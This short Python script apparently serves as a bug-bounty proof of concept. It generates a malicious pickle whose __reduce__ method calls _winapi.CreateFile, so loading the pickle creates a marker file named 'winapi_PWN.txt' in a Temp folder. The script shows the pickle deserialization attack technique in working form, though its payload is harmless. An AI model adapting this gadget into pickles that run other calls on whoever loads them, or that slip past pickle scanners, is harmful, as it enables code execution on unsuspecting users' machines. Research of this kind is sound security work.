| import pickle, _winapi | |
| OUT = r"D:\0projects\bountykimi\tmp\artifacts\winapi_createfile.pkl" | |
| class E: | |
| def __reduce__(self): | |
| return (_winapi.CreateFile, (r"C:/Users/uozer/AppData/Local/Temp/opencode/winapi_PWN.txt", 0x40000000, 0, 0, 2, 0x80, 0)) | |
| pickle.dump({"e": E()}, open(OUT, "wb")) | |
| print("gen ok") | |